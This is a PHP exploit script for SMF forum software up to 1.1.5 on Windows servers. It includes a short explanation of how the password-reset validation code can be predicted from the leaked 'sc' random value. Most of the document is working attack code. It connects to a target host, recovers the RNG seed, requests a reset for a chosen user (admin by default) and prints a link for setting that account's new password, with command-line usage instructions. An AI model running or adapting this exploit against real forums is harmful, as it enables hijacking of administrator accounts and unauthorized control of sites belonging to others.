<?php echo "---------------------------------------------------------------\n"; echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n"; echo "(c)oded by Raz0r (http://Raz0r.name/)\n"; echo "---------------------------------------------------------------\n"; if ($argc<3) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$argv[0]} [host] [path] OPTIONS\n\n"; echo "[host] - target server where SMF is installed\n"; echo "[path] - path to SMF\n\n"; echo "OPTIONS:\n"; echo "--userid=[value] (default: 1)\n"; echo "--username=[value] (default: admin)\n"; echo "examples:\n"; echo "php {$argv[0]} site.com /forum/\n"; echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n"; die; } /** * Software site: http://www.simplemachines.org * * SMF leaks current state of random number generator through hidden input parameter `sc` * of the password reminder form: * * $_SESSION['rand_code'] = md5(session_id() . rand()); * $sc = $_SESSION['rand_code']; * * Since max random number generated with rand() on win32 is 32767 and session id * is known an attacker can reverse the md5 hash and get the random number value. * On win32 every random number generated with rand() is used as a seed for the next * random number. So if SMF is installed on win32 platform an attacker can predict * all the next random numbers. When password reset is requested SMF uses rand() * function to generate validation code: * * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10); * * So prediction of the validation code is possible and an atacker can set his * own password for any user. * * More information about random number prediction: * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ * * More information about the behaviour of rand() on win32 (in Russian): * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/ */ set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $host = $argv[1]; $path = $argv[2]; for($i=3;$i<=$argc;$i++){ if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) { list(,$userid) = explode("=",$argv[$i]); } if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) { list(,$username) = explode("=",$argv[$i]); } } if(!isset($userid))$userid="1"; if(!isset($username))$username="admin"; $sess = md5(mt_rand()); echo "[~] Connecting to $host ... "; $ock = fsockopen($host,80); if($ock) echo "OK\n"; else die("failed\n"); $packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cookie: PHPSESSID=$sess;\r\n"; $packet.= "Keep-Alive: 300\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; fputs($ock, $packet); while(!feof($ock)) { $resp = fgets($ock); preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out); if(isset($out[1])) { $md5 = $out[1]; break; } } if($md5) { $seed = getseed($md5); if($seed) { echo "[+] Seed for next random number is $seed\n"; } else die("[-] Can't calculate seed\n"); } else die("[-] Random number hash not found\n"); function getseed($md5) { global $sess; for($i=0;$i<=32767;$i++){ if($md5 == md5($sess . $i)) { return $i; } } } $sc = md5($sess . $seed); $data = "user=".urlencode($username)."&sc=$sc"; $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cookie: PHPSESSID=$sess;\r\n"; $packet.= "Connection: close\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n\r\n"; $packet.= $data; fputs($ock, $packet); $resp=''; while(!feof($ock)) { $resp .= fgets($ock); } if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) { die("[-] An error ocurred while requesting validation code\n"); } if(strpos($resp,"javascript:history.go(-1)")!==false) { die("[-] Invalid username\n"); } srand($seed); for($i=0;$i<6;$i++){ rand(); } $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10); echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n"; ?>